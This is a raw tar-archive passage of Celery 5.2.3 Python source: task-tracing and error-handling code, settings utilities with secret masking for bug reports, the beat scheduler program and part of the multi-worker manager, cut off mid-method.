type_, _, tb = sys.exc_info() try: reason = self.retval einfo = ExceptionInfo((type_, reason, tb)) if store_errors: task.backend.mark_as_retry( req.id, reason.exc, einfo.traceback, request=req, ) task.on_retry(reason.exc, req.id, req.args, req.kwargs, einfo) signals.task_retry.send(sender=task, request=req, reason=reason, einfo=einfo) info(LOG_RETRY, { 'id': req.id, 'name': get_task_name(req, task.name), 'exc': str(reason), }) return einfo finally: del tb def handle_failure(self, task, req, store_errors=True, call_errbacks=True): """Handle exception.""" _, _, tb = sys.exc_info() try: exc = self.retval # make sure we only send pickleable exceptions back to parent. einfo = ExceptionInfo() einfo.exception = get_pickleable_exception(einfo.exception) einfo.type = get_pickleable_etype(einfo.type) task.backend.mark_as_failure( req.id, exc, einfo.traceback, request=req, store_result=store_errors, call_errbacks=call_errbacks, ) task.on_failure(exc, req.id, req.args, req.kwargs, einfo) signals.task_failure.send(sender=task, task_id=req.id, exception=exc, args=req.args, kwargs=req.kwargs, traceback=tb, einfo=einfo) self._log_error(task, req, einfo) return einfo finally: del tb def _log_error(self, task, req, einfo): eobj = einfo.exception = get_pickled_exception(einfo.exception) exception, traceback, exc_info, sargs, skwargs = ( safe_repr(eobj), safe_str(einfo.traceback), einfo.exc_info, safe_repr(req.args), safe_repr(req.kwargs), ) policy = get_log_policy(task, einfo, eobj) context = { 'hostname': req.hostname, 'id': req.id, 'name': get_task_name(req, task.name), 'exc': exception, 'traceback': traceback, 'args': sargs, 'kwargs': skwargs, 'description': policy.description, 'internal': einfo.internal, } logger.log(policy.severity, policy.format.strip(), context, exc_info=exc_info if policy.traceback else None, extra={'data': context}) def traceback_clear(exc=None): # Cleared Tb, but einfo still has a reference to Traceback. # exc cleans up the Traceback at the last moment that can be revealed. tb = None if exc is not None: if hasattr(exc, '__traceback__'): tb = exc.__traceback__ else: _, _, tb = sys.exc_info() else: _, _, tb = sys.exc_info() while tb is not None: try: tb.tb_frame.clear() tb.tb_frame.f_locals except RuntimeError: # Ignore the exception raised if the frame is still executing. pass tb = tb.tb_next def build_tracer(name, task, loader=None, hostname=None, store_errors=True, Info=TraceInfo, eager=False, propagate=False, app=None, monotonic=time.monotonic, trace_ok_t=trace_ok_t, IGNORE_STATES=IGNORE_STATES): """Return a function that traces task execution. Catches all exceptions and updates result backend with the state and result. If the call was successful, it saves the result to the task result backend, and sets the task status to `"SUCCESS"`. If the call raises :exc:`~@Retry`, it extracts the original exception, uses that as the result and sets the task state to `"RETRY"`. If the call results in an exception, it saves the exception as the task result, and sets the task state to `"FAILURE"`. Return a function that takes the following arguments: :param uuid: The id of the task. :param args: List of positional args to pass on to the function. :param kwargs: Keyword arguments mapping to pass on to the function. :keyword request: Request dict. """ # pylint: disable=too-many-statements # If the task doesn't define a custom __call__ method # we optimize it away by simply calling the run method directly, # saving the extra method call and a line less in the stack trace. 
fun = task if task_has_custom(task, '__call__') else task.run loader = loader or app.loader ignore_result = task.ignore_result track_started = task.track_started track_started = not eager and (task.track_started and not ignore_result) # #6476 if eager and not ignore_result and task.store_eager_result: publish_result = True else: publish_result = not eager and not ignore_result deduplicate_successful_tasks = ((app.conf.task_acks_late or task.acks_late) and app.conf.worker_deduplicate_successful_tasks and app.backend.persistent) hostname = hostname or gethostname() inherit_parent_priority = app.conf.task_inherit_parent_priority loader_task_init = loader.on_task_init loader_cleanup = loader.on_process_cleanup task_before_start = None task_on_success = None task_after_return = None if task_has_custom(task, 'before_start'): task_before_start = task.before_start if task_has_custom(task, 'on_success'): task_on_success = task.on_success if task_has_custom(task, 'after_return'): task_after_return = task.after_return pid = os.getpid() request_stack = task.request_stack push_request = request_stack.push pop_request = request_stack.pop push_task = _task_stack.push pop_task = _task_stack.pop _does_info = logger.isEnabledFor(logging.INFO) resultrepr_maxsize = task.resultrepr_maxsize prerun_receivers = signals.task_prerun.receivers postrun_receivers = signals.task_postrun.receivers success_receivers = signals.task_success.receivers from celery import canvas signature = canvas.maybe_signature # maybe_ does not clone if already def on_error(request, exc, uuid, state=FAILURE, call_errbacks=True): if propagate: raise I = Info(state, exc) R = I.handle_error_state( task, request, eager=eager, call_errbacks=call_errbacks, ) return I, R, I.state, I.retval def trace_task(uuid, args, kwargs, request=None): # R - is the possibly prepared return value. # I - is the Info object. # T - runtime # Rstr - textual representation of return value # retval - is the always unmodified return value. # state - is the resulting task state. # This function is very long because we've unrolled all the calls # for performance reasons, and because the function is so long # we want the main variables (I, and R) to stand out visually from the # the rest of the variables, so breaking PEP8 is worth it ;) R = I = T = Rstr = retval = state = None task_request = None time_start = monotonic() try: try: kwargs.items except AttributeError: raise InvalidTaskError( 'Task keyword arguments is not a mapping') task_request = Context(request or {}, args=args, called_directly=False, kwargs=kwargs) redelivered = (task_request.delivery_info and task_request.delivery_info.get('redelivered', False)) if deduplicate_successful_tasks and redelivered: if task_request.id in successful_requests: return trace_ok_t(R, I, T, Rstr) r = AsyncResult(task_request.id, app=app) try: state = r.state except BackendGetMetaError: pass else: if state == SUCCESS: info(LOG_IGNORED, { 'id': task_request.id, 'name': get_task_name(task_request, name), 'description': 'Task already completed successfully.' 
}) return trace_ok_t(R, I, T, Rstr) push_task(task) root_id = task_request.root_id or uuid task_priority = task_request.delivery_info.get('priority') if \ inherit_parent_priority else None push_request(task_request) try: # -*- PRE -*- if prerun_receivers: send_prerun(sender=task, task_id=uuid, task=task, args=args, kwargs=kwargs) loader_task_init(uuid, task) if track_started: task.backend.store_result( uuid, {'pid': pid, 'hostname': hostname}, STARTED, request=task_request, ) # -*- TRACE -*- try: if task_before_start: task_before_start(uuid, args, kwargs) R = retval = fun(*args, **kwargs) state = SUCCESS except Reject as exc: I, R = Info(REJECTED, exc), ExceptionInfo(internal=True) state, retval = I.state, I.retval I.handle_reject(task, task_request) traceback_clear(exc) except Ignore as exc: I, R = Info(IGNORED, exc), ExceptionInfo(internal=True) state, retval = I.state, I.retval I.handle_ignore(task, task_request) traceback_clear(exc) except Retry as exc: I, R, state, retval = on_error( task_request, exc, uuid, RETRY, call_errbacks=False) traceback_clear(exc) except Exception as exc: I, R, state, retval = on_error(task_request, exc, uuid) traceback_clear(exc) except BaseException: raise else: try: # callback tasks must be applied before the result is # stored, so that result.children is populated. # groups are called inline and will store trail # separately, so need to call them separately # so that the trail's not added multiple times :( # (Issue #1936) callbacks = task.request.callbacks if callbacks: if len(task.request.callbacks) > 1: sigs, groups = [], [] for sig in callbacks: sig = signature(sig, app=app) if isinstance(sig, group): groups.append(sig) else: sigs.append(sig) for group_ in groups: group_.apply_async( (retval,), parent_id=uuid, root_id=root_id, priority=task_priority ) if sigs: group(sigs, app=app).apply_async( (retval,), parent_id=uuid, root_id=root_id, priority=task_priority ) else: signature(callbacks[0], app=app).apply_async( (retval,), parent_id=uuid, root_id=root_id, priority=task_priority ) # execute first task in chain chain = task_request.chain if chain: _chsig = signature(chain.pop(), app=app) _chsig.apply_async( (retval,), chain=chain, parent_id=uuid, root_id=root_id, priority=task_priority ) task.backend.mark_as_done( uuid, retval, task_request, publish_result, ) except EncodeError as exc: I, R, state, retval = on_error(task_request, exc, uuid) else: Rstr = saferepr(R, resultrepr_maxsize) T = monotonic() - time_start if task_on_success: task_on_success(retval, uuid, args, kwargs) if success_receivers: send_success(sender=task, result=retval) if _does_info: info(LOG_SUCCESS, { 'id': uuid, 'name': get_task_name(task_request, name), 'return_value': Rstr, 'runtime': T, 'args': safe_repr(args), 'kwargs': safe_repr(kwargs), }) # -* POST *- if state not in IGNORE_STATES: if task_after_return: task_after_return( state, retval, uuid, args, kwargs, None, ) finally: try: if postrun_receivers: send_postrun(sender=task, task_id=uuid, task=task, args=args, kwargs=kwargs, retval=retval, state=state) finally: pop_task() pop_request() if not eager: try: task.backend.process_cleanup() loader_cleanup() except (KeyboardInterrupt, SystemExit, MemoryError): raise except Exception as exc: logger.error('Process cleanup failed: %r', exc, exc_info=True) except MemoryError: raise except Exception as exc: _signal_internal_error(task, uuid, args, kwargs, request, exc) if eager: raise R = report_internal_error(task, exc) if task_request is not None: I, _, _, _ = on_error(task_request, 
exc, uuid) return trace_ok_t(R, I, T, Rstr) return trace_task def trace_task(task, uuid, args, kwargs, request=None, **opts): """Trace task execution.""" request = {} if not request else request try: if task.__trace__ is None: task.__trace__ = build_tracer(task.name, task, **opts) return task.__trace__(uuid, args, kwargs, request) except Exception as exc: _signal_internal_error(task, uuid, args, kwargs, request, exc) return trace_ok_t(report_internal_error(task, exc), TraceInfo(FAILURE, exc), 0.0, None) def _signal_internal_error(task, uuid, args, kwargs, request, exc): """Send a special `internal_error` signal to the app for outside body errors.""" try: _, _, tb = sys.exc_info() einfo = ExceptionInfo() einfo.exception = get_pickleable_exception(einfo.exception) einfo.type = get_pickleable_etype(einfo.type) signals.task_internal_error.send( sender=task, task_id=uuid, args=args, kwargs=kwargs, request=request, exception=exc, traceback=tb, einfo=einfo, ) finally: del tb def trace_task_ret(name, uuid, request, body, content_type, content_encoding, loads=loads_message, app=None, **extra_request): app = app or current_app._get_current_object() embed = None if content_type: accept = prepare_accept_content(app.conf.accept_content) args, kwargs, embed = loads( body, content_type, content_encoding, accept=accept, ) else: args, kwargs, embed = body hostname = gethostname() request.update({ 'args': args, 'kwargs': kwargs, 'hostname': hostname, 'is_eager': False, }, **embed or {}) R, I, T, Rstr = trace_task(app.tasks[name], uuid, args, kwargs, request, app=app) return (1, R, T) if I else (0, Rstr, T) def fast_trace_task(task, uuid, request, body, content_type, content_encoding, loads=loads_message, _loc=None, hostname=None, **_): _loc = _localized if not _loc else _loc embed = None tasks, accept, hostname = _loc if content_type: args, kwargs, embed = loads( body, content_type, content_encoding, accept=accept, ) else: args, kwargs, embed = body request.update({ 'args': args, 'kwargs': kwargs, 'hostname': hostname, 'is_eager': False, }, **embed or {}) R, I, T, Rstr = tasks[task].__trace__( uuid, args, kwargs, request, ) return (1, R, T) if I else (0, Rstr, T) def report_internal_error(task, exc): _type, _value, _tb = sys.exc_info() try: _value = task.backend.prepare_exception(exc, 'pickle') exc_info = ExceptionInfo((_type, _value, _tb), internal=True) warn(RuntimeWarning( 'Exception raised outside body: {!r}:\n{}'.format( exc, exc_info.traceback))) return exc_info finally: del _tb def setup_worker_optimizations(app, hostname=None): """Setup worker related optimizations.""" hostname = hostname or gethostname() # make sure custom Task.__call__ methods that calls super # won't mess up the request/task stack. _install_stack_protection() # all new threads start without a current app, so if an app is not # passed on to the thread it will fall back to the "default app", # which then could be the wrong app. So for the worker # we set this to always return our app. This is a hack, # and means that only a single app can be used for workers # running in the same process. app.set_current() app.set_default() # evaluate all task classes by finalizing the app. 
app.finalize() # set fast shortcut to task registry _localized[:] = [ app._tasks, prepare_accept_content(app.conf.accept_content), hostname, ] app.use_fast_trace_task = True def reset_worker_optimizations(app=current_app): """Reset previously configured optimizations.""" try: delattr(BaseTask, '_stackprotected') except AttributeError: pass try: BaseTask.__call__ = _patched.pop('BaseTask.__call__') except KeyError: pass app.use_fast_trace_task = False def _install_stack_protection(): # Patches BaseTask.__call__ in the worker to handle the edge case # where people override it and also call super. # # - The worker optimizes away BaseTask.__call__ and instead # calls task.run directly. # - so with the addition of current_task and the request stack # BaseTask.__call__ now pushes to those stacks so that # they work when tasks are called directly. # # The worker only optimizes away __call__ in the case # where it hasn't been overridden, so the request/task stack # will blow if a custom task class defines __call__ and also # calls super(). if not getattr(BaseTask, '_stackprotected', False): _patched['BaseTask.__call__'] = orig = BaseTask.__call__ def __protected_call__(self, *args, **kwargs): stack = self.request_stack req = stack.top if req and not req._protected and \ len(stack) == 1 and not req.called_directly: req._protected = 1 return self.run(*args, **kwargs) return orig(self, *args, **kwargs) BaseTask.__call__ = __protected_call__ BaseTask._stackprotected = True ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/utils.py0000664000175000017500000003160100000000000016453 0ustar00asifasif00000000000000"""App utilities: Compat settings, bug-report tool, pickling apps.""" import os import platform as _platform import re from collections import namedtuple from collections.abc import Mapping from copy import deepcopy from types import ModuleType from kombu.utils.url import maybe_sanitize_url from celery.exceptions import ImproperlyConfigured from celery.platforms import pyimplementation from celery.utils.collections import ConfigurationView from celery.utils.imports import import_from_cwd, qualname, symbol_by_name from celery.utils.text import pretty from .defaults import (_OLD_DEFAULTS, _OLD_SETTING_KEYS, _TO_NEW_KEY, _TO_OLD_KEY, DEFAULTS, SETTING_KEYS, find) __all__ = ( 'Settings', 'appstr', 'bugreport', 'filter_hidden_settings', 'find_app', ) #: Format used to generate bug-report information. BUGREPORT_INFO = """ software -> celery:{celery_v} kombu:{kombu_v} py:{py_v} billiard:{billiard_v} {driver_v} platform -> system:{system} arch:{arch} kernel version:{kernel_version} imp:{py_i} loader -> {loader} settings -> transport:{transport} results:{results} {human_settings} """ HIDDEN_SETTINGS = re.compile( 'API|TOKEN|KEY|SECRET|PASS|PROFANITIES_LIST|SIGNATURE|DATABASE', re.IGNORECASE, ) E_MIX_OLD_INTO_NEW = """ Cannot mix new and old setting keys, please rename the following settings to the new format: {renames} """ E_MIX_NEW_INTO_OLD = """ Cannot mix new setting names with old setting names, please rename the following settings to use the old format: {renames} Or change all of the settings to use the new format :) """ FMT_REPLACE_SETTING = '{replace:<36} -> {with_}' def appstr(app): """String used in __repr__ etc, to id app instances.""" return f'{app.main or "__main__"} at {id(app):#x}' class Settings(ConfigurationView): """Celery settings object. .. 
seealso: :ref:`configuration` for a full list of configuration keys. """ def __init__(self, *args, deprecated_settings=None, **kwargs): super().__init__(*args, **kwargs) self.deprecated_settings = deprecated_settings @property def broker_read_url(self): return ( os.environ.get('CELERY_BROKER_READ_URL') or self.get('broker_read_url') or self.broker_url ) @property def broker_write_url(self): return ( os.environ.get('CELERY_BROKER_WRITE_URL') or self.get('broker_write_url') or self.broker_url ) @property def broker_url(self): return ( os.environ.get('CELERY_BROKER_URL') or self.first('broker_url', 'broker_host') ) @property def result_backend(self): return ( os.environ.get('CELERY_RESULT_BACKEND') or self.first('result_backend', 'CELERY_RESULT_BACKEND') ) @property def task_default_exchange(self): return self.first( 'task_default_exchange', 'task_default_queue', ) @property def task_default_routing_key(self): return self.first( 'task_default_routing_key', 'task_default_queue', ) @property def timezone(self): # this way we also support django's time zone. return self.first('timezone', 'time_zone') def without_defaults(self): """Return the current configuration, but without defaults.""" # the last stash is the default settings, so just skip that return Settings({}, self.maps[:-1]) def value_set_for(self, key): return key in self.without_defaults() def find_option(self, name, namespace=''): """Search for option by name. Example: >>> from proj.celery import app >>> app.conf.find_option('disable_rate_limits') ('worker', 'prefetch_multiplier', bool default->False>)) Arguments: name (str): Name of option, cannot be partial. namespace (str): Preferred name-space (``None`` by default). Returns: Tuple: of ``(namespace, key, type)``. """ return find(name, namespace) def find_value_for_key(self, name, namespace='celery'): """Shortcut to ``get_by_parts(*find_option(name)[:-1])``.""" return self.get_by_parts(*self.find_option(name, namespace)[:-1]) def get_by_parts(self, *parts): """Return the current value for setting specified as a path. Example: >>> from proj.celery import app >>> app.conf.get_by_parts('worker', 'disable_rate_limits') False """ return self['_'.join(part for part in parts if part)] def finalize(self): # See PendingConfiguration in celery/app/base.py # first access will read actual configuration. 
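# Subscripting the view with any key (a deliberately bogus one here)
# forces the lazy PendingConfiguration mapping to load the actual
# settings; the KeyError raised for '__bogus__' itself is expected and
# swallowed.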
try: self['__bogus__'] except KeyError: pass return self def table(self, with_defaults=False, censored=True): filt = filter_hidden_settings if censored else lambda v: v dict_members = dir(dict) self.finalize() settings = self if with_defaults else self.without_defaults() return filt({ k: v for k, v in settings.items() if not k.startswith('_') and k not in dict_members }) def humanize(self, with_defaults=False, censored=True): """Return a human readable text showing configuration changes.""" return '\n'.join( f'{key}: {pretty(value, width=50)}' for key, value in self.table(with_defaults, censored).items()) def maybe_warn_deprecated_settings(self): # TODO: Remove this method in Celery 6.0 if self.deprecated_settings: from celery.app.defaults import _TO_NEW_KEY from celery.utils import deprecated for setting in self.deprecated_settings: deprecated.warn(description=f'The {setting!r} setting', removal='6.0.0', alternative=f'Use the {_TO_NEW_KEY[setting]} instead') return True return False def _new_key_to_old(key, convert=_TO_OLD_KEY.get): return convert(key, key) def _old_key_to_new(key, convert=_TO_NEW_KEY.get): return convert(key, key) _settings_info_t = namedtuple('settings_info_t', ( 'defaults', 'convert', 'key_t', 'mix_error', )) _settings_info = _settings_info_t( DEFAULTS, _TO_NEW_KEY, _old_key_to_new, E_MIX_OLD_INTO_NEW, ) _old_settings_info = _settings_info_t( _OLD_DEFAULTS, _TO_OLD_KEY, _new_key_to_old, E_MIX_NEW_INTO_OLD, ) def detect_settings(conf, preconf=None, ignore_keys=None, prefix=None, all_keys=None, old_keys=None): preconf = {} if not preconf else preconf ignore_keys = set() if not ignore_keys else ignore_keys all_keys = SETTING_KEYS if not all_keys else all_keys old_keys = _OLD_SETTING_KEYS if not old_keys else old_keys source = conf if conf is None: source, conf = preconf, {} have = set(source.keys()) - ignore_keys is_in_new = have.intersection(all_keys) is_in_old = have.intersection(old_keys) info = None if is_in_new: # have new setting names info, left = _settings_info, is_in_old if is_in_old and len(is_in_old) > len(is_in_new): # Majority of the settings are old. info, left = _old_settings_info, is_in_new if is_in_old: # have old setting names, or a majority of the names are old. if not info: info, left = _old_settings_info, is_in_new if is_in_new and len(is_in_new) > len(is_in_old): # Majority of the settings are new info, left = _settings_info, is_in_old else: # no settings, just use new format. info, left = _settings_info, is_in_old if prefix: # always use new format if prefix is used. info, left = _settings_info, set() # only raise error for keys that the user didn't provide two keys # for (e.g., both ``result_expires`` and ``CELERY_TASK_RESULT_EXPIRES``). really_left = {key for key in left if info.convert[key] not in have} if really_left: # user is mixing old/new, or new/old settings, give renaming # suggestions. 
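# The error message lists each offending key next to its replacement
# using FMT_REPLACE_SETTING, e.g. (illustrative, assuming an old-style
# key was mixed into an otherwise new-style configuration):
#
#     CELERY_RESULT_BACKEND                -> result_backend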
raise ImproperlyConfigured(info.mix_error.format(renames='\n'.join( FMT_REPLACE_SETTING.format(replace=key, with_=info.convert[key]) for key in sorted(really_left) ))) preconf = {info.convert.get(k, k): v for k, v in preconf.items()} defaults = dict(deepcopy(info.defaults), **preconf) return Settings( preconf, [conf, defaults], (_old_key_to_new, _new_key_to_old), deprecated_settings=is_in_old, prefix=prefix, ) class AppPickler: """Old application pickler/unpickler (< 3.1).""" def __call__(self, cls, *args): kwargs = self.build_kwargs(*args) app = self.construct(cls, **kwargs) self.prepare(app, **kwargs) return app def prepare(self, app, **kwargs): app.conf.update(kwargs['changes']) def build_kwargs(self, *args): return self.build_standard_kwargs(*args) def build_standard_kwargs(self, main, changes, loader, backend, amqp, events, log, control, accept_magic_kwargs, config_source=None): return {'main': main, 'loader': loader, 'backend': backend, 'amqp': amqp, 'changes': changes, 'events': events, 'log': log, 'control': control, 'set_as_current': False, 'config_source': config_source} def construct(self, cls, **kwargs): return cls(**kwargs) def _unpickle_app(cls, pickler, *args): """Rebuild app for versions 2.5+.""" return pickler()(cls, *args) def _unpickle_app_v2(cls, kwargs): """Rebuild app for versions 3.1+.""" kwargs['set_as_current'] = False return cls(**kwargs) def filter_hidden_settings(conf): """Filter sensitive settings.""" def maybe_censor(key, value, mask='*' * 8): if isinstance(value, Mapping): return filter_hidden_settings(value) if isinstance(key, str): if HIDDEN_SETTINGS.search(key): return mask elif 'broker_url' in key.lower(): from kombu import Connection return Connection(value).as_uri(mask=mask) elif 'backend' in key.lower(): return maybe_sanitize_url(value, mask=mask) return value return {k: maybe_censor(k, v) for k, v in conf.items()} def bugreport(app): """Return a string containing information useful in bug-reports.""" import billiard import kombu import celery try: conn = app.connection() driver_v = '{}:{}'.format(conn.transport.driver_name, conn.transport.driver_version()) transport = conn.transport_cls except Exception: # pylint: disable=broad-except transport = driver_v = '' return BUGREPORT_INFO.format( system=_platform.system(), arch=', '.join(x for x in _platform.architecture() if x), kernel_version=_platform.release(), py_i=pyimplementation(), celery_v=celery.VERSION_BANNER, kombu_v=kombu.__version__, billiard_v=billiard.__version__, py_v=_platform.python_version(), driver_v=driver_v, transport=transport, results=maybe_sanitize_url(app.conf.result_backend or 'disabled'), human_settings=app.conf.humanize(), loader=qualname(app.loader.__class__), ) def find_app(app, symbol_by_name=symbol_by_name, imp=import_from_cwd): """Find app by name.""" from .base import Celery try: sym = symbol_by_name(app, imp=imp) except AttributeError: # last part was not an attribute, but a module sym = imp(app) if isinstance(sym, ModuleType) and ':' not in app: try: found = sym.app if isinstance(found, ModuleType): raise AttributeError() except AttributeError: try: found = sym.celery if isinstance(found, ModuleType): raise AttributeError( "attribute 'celery' is the celery module not the instance of celery") except AttributeError: if getattr(sym, '__path__', None): try: return find_app( f'{app}.celery', symbol_by_name=symbol_by_name, imp=imp, ) except ImportError: pass for suspect in vars(sym).values(): if isinstance(suspect, Celery): return suspect raise else: return found else: return 
found return sym ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.3797493 celery-5.2.3/celery/apps/0000775000175000017500000000000000000000000015123 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/apps/__init__.py0000664000175000017500000000000000000000000017222 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/apps/beat.py0000664000175000017500000001203100000000000016405 0ustar00asifasif00000000000000"""Beat command-line program. This module is the 'program-version' of :mod:`celery.beat`. It does everything necessary to run that module as an actual application, like installing signal handlers and so on. """ import numbers import socket import sys from datetime import datetime from celery import VERSION_BANNER, beat, platforms from celery.utils.imports import qualname from celery.utils.log import LOG_LEVELS, get_logger from celery.utils.time import humanize_seconds __all__ = ('Beat',) STARTUP_INFO_FMT = """ LocalTime -> {timestamp} Configuration -> . broker -> {conninfo} . loader -> {loader} . scheduler -> {scheduler} {scheduler_info} . logfile -> {logfile}@%{loglevel} . maxinterval -> {hmax_interval} ({max_interval}s) """.strip() logger = get_logger('celery.beat') class Beat: """Beat as a service.""" Service = beat.Service app = None def __init__(self, max_interval=None, app=None, socket_timeout=30, pidfile=None, no_color=None, loglevel='WARN', logfile=None, schedule=None, scheduler=None, scheduler_cls=None, # XXX use scheduler redirect_stdouts=None, redirect_stdouts_level=None, **kwargs): self.app = app = app or self.app either = self.app.either self.loglevel = loglevel self.logfile = logfile self.schedule = either('beat_schedule_filename', schedule) self.scheduler_cls = either( 'beat_scheduler', scheduler, scheduler_cls) self.redirect_stdouts = either( 'worker_redirect_stdouts', redirect_stdouts) self.redirect_stdouts_level = either( 'worker_redirect_stdouts_level', redirect_stdouts_level) self.max_interval = max_interval self.socket_timeout = socket_timeout self.no_color = no_color self.colored = app.log.colored( self.logfile, enabled=not no_color if no_color is not None else no_color, ) self.pidfile = pidfile if not isinstance(self.loglevel, numbers.Integral): self.loglevel = LOG_LEVELS[self.loglevel.upper()] def run(self): print(str(self.colored.cyan( f'celery beat v{VERSION_BANNER} is starting.'))) self.init_loader() self.set_process_title() self.start_scheduler() def setup_logging(self, colorize=None): if colorize is None and self.no_color is not None: colorize = not self.no_color self.app.log.setup(self.loglevel, self.logfile, self.redirect_stdouts, self.redirect_stdouts_level, colorize=colorize) def start_scheduler(self): if self.pidfile: platforms.create_pidlock(self.pidfile) service = self.Service( app=self.app, max_interval=self.max_interval, scheduler_cls=self.scheduler_cls, schedule_filename=self.schedule, ) print(self.banner(service)) self.setup_logging() if self.socket_timeout: logger.debug('Setting default socket timeout to %r', self.socket_timeout) socket.setdefaulttimeout(self.socket_timeout) try: self.install_sync_handler(service) service.start() except Exception as exc: logger.critical('beat raised exception %s: %r', exc.__class__, exc, exc_info=True) raise def banner(self, service): c = 
self.colored return str( c.blue('__ ', c.magenta('-'), c.blue(' ... __ '), c.magenta('-'), c.blue(' _\n'), c.reset(self.startup_info(service))), ) def init_loader(self): # Run the worker init handler. # (Usually imports task modules and such.) self.app.loader.init_worker() self.app.finalize() def startup_info(self, service): scheduler = service.get_scheduler(lazy=True) return STARTUP_INFO_FMT.format( conninfo=self.app.connection().as_uri(), timestamp=datetime.now().replace(microsecond=0), logfile=self.logfile or '[stderr]', loglevel=LOG_LEVELS[self.loglevel], loader=qualname(self.app.loader), scheduler=qualname(scheduler), scheduler_info=scheduler.info, hmax_interval=humanize_seconds(scheduler.max_interval), max_interval=scheduler.max_interval, ) def set_process_title(self): arg_start = 'manage' in sys.argv[0] and 2 or 1 platforms.set_process_title( 'celery beat', info=' '.join(sys.argv[arg_start:]), ) def install_sync_handler(self, service): """Install a `SIGTERM` + `SIGINT` handler saving the schedule.""" def _sync(signum, frame): service.sync() raise SystemExit() platforms.signals.update(SIGTERM=_sync, SIGINT=_sync) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/apps/multi.py0000664000175000017500000004001600000000000016630 0ustar00asifasif00000000000000"""Start/stop/manage workers.""" import errno import os import shlex import signal import sys from collections import OrderedDict, UserList, defaultdict from functools import partial from subprocess import Popen from time import sleep from kombu.utils.encoding import from_utf8 from kombu.utils.objects import cached_property from celery.platforms import IS_WINDOWS, Pidfile, signal_name from celery.utils.nodenames import (gethostname, host_format, node_format, nodesplit) from celery.utils.saferepr import saferepr __all__ = ('Cluster', 'Node') CELERY_EXE = 'celery' def celery_exe(*args): return ' '.join((CELERY_EXE,) + args) def build_nodename(name, prefix, suffix): hostname = suffix if '@' in name: nodename = host_format(name) shortname, hostname = nodesplit(nodename) name = shortname else: shortname = f'{prefix}{name}' nodename = host_format( f'{shortname}@{hostname}', ) return name, nodename, hostname def build_expander(nodename, shortname, hostname): return partial( node_format, name=nodename, N=shortname, d=hostname, h=nodename, i='%i', I='%I', ) def format_opt(opt, value): if not value: return opt if opt.startswith('--'): return f'{opt}={value}' return f'{opt} {value}' def _kwargs_to_command_line(kwargs): return { ('--{}'.format(k.replace('_', '-')) if len(k) > 1 else f'-{k}'): f'{v}' for k, v in kwargs.items() } class NamespacedOptionParser: def __init__(self, args): self.args = args self.options = OrderedDict() self.values = [] self.passthrough = '' self.namespaces = defaultdict(lambda: OrderedDict()) def parse(self): rargs = [arg for arg in self.args if arg] pos = 0 while pos < len(rargs): arg = rargs[pos] if arg == '--': self.passthrough = ' '.join(rargs[pos:]) break elif arg[0] == '-': if arg[1] == '-': self.process_long_opt(arg[2:]) else: value = None if len(rargs) > pos + 1 and rargs[pos + 1][0] != '-': value = rargs[pos + 1] pos += 1 self.process_short_opt(arg[1:], value) else: self.values.append(arg) pos += 1 def process_long_opt(self, arg, value=None): if '=' in arg: arg, value = arg.split('=', 1) self.add_option(arg, value, short=False) def process_short_opt(self, arg, value=None): self.add_option(arg, value, short=True) def optmerge(self, ns, 
defaults=None): if defaults is None: defaults = self.options return OrderedDict(defaults, **self.namespaces[ns]) def add_option(self, name, value, short=False, ns=None): prefix = short and '-' or '--' dest = self.options if ':' in name: name, ns = name.split(':') dest = self.namespaces[ns] dest[prefix + name] = value class Node: """Represents a node in a cluster.""" def __init__(self, name, cmd=None, append=None, options=None, extra_args=None): self.name = name self.cmd = cmd or f"-m {celery_exe('worker', '--detach')}" self.append = append self.extra_args = extra_args or '' self.options = self._annotate_with_default_opts( options or OrderedDict()) self.expander = self._prepare_expander() self.argv = self._prepare_argv() self._pid = None def _annotate_with_default_opts(self, options): options['-n'] = self.name self._setdefaultopt(options, ['--pidfile', '-p'], '/var/run/celery/%n.pid') self._setdefaultopt(options, ['--logfile', '-f'], '/var/log/celery/%n%I.log') self._setdefaultopt(options, ['--executable'], sys.executable) return options def _setdefaultopt(self, d, alt, value): for opt in alt[1:]: try: return d[opt] except KeyError: pass value = d.setdefault(alt[0], os.path.normpath(value)) dir_path = os.path.dirname(value) if dir_path and not os.path.exists(dir_path): os.makedirs(dir_path) return value def _prepare_expander(self): shortname, hostname = self.name.split('@', 1) return build_expander( self.name, shortname, hostname) def _prepare_argv(self): cmd = self.expander(self.cmd).split(' ') i = cmd.index('celery') + 1 options = self.options.copy() for opt, value in self.options.items(): if opt in ( '-A', '--app', '-b', '--broker', '--result-backend', '--loader', '--config', '--workdir', '-C', '--no-color', '-q', '--quiet', ): cmd.insert(i, format_opt(opt, self.expander(value))) options.pop(opt) cmd = [' '.join(cmd)] argv = tuple( cmd + [format_opt(opt, self.expander(value)) for opt, value in options.items()] + [self.extra_args] ) if self.append: argv += (self.expander(self.append),) return argv def alive(self): return self.send(0) def send(self, sig, on_error=None): pid = self.pid if pid: try: os.kill(pid, sig) except OSError as exc: if exc.errno != errno.ESRCH: raise maybe_call(on_error, self) return False return True maybe_call(on_error, self) def start(self, env=None, **kwargs): return self._waitexec( self.argv, path=self.executable, env=env, **kwargs) def _waitexec(self, argv, path=sys.executable, env=None, on_spawn=None, on_signalled=None, on_failure=None): argstr = self.prepare_argv(argv, path) maybe_call(on_spawn, self, argstr=' '.join(argstr), env=env) pipe = Popen(argstr, env=env) return self.handle_process_exit( pipe.wait(), on_signalled=on_signalled, on_failure=on_failure, ) def handle_process_exit(self, retcode, on_signalled=None, on_failure=None): if retcode < 0: maybe_call(on_signalled, self, -retcode) return -retcode elif retcode > 0: maybe_call(on_failure, self, retcode) return retcode def prepare_argv(self, argv, path): args = ' '.join([path] + list(argv)) return shlex.split(from_utf8(args), posix=not IS_WINDOWS) def getopt(self, *alt): for opt in alt: try: return self.options[opt] except KeyError: pass raise KeyError(alt[0]) def __repr__(self): return f'<{type(self).__name__}: {self.name}>' @cached_property def pidfile(self): return self.expander(self.getopt('--pidfile', '-p')) @cached_property def logfile(self): return self.expander(self.getopt('--logfile', '-f')) @property def pid(self): if self._pid is not None: return self._pid try: return 
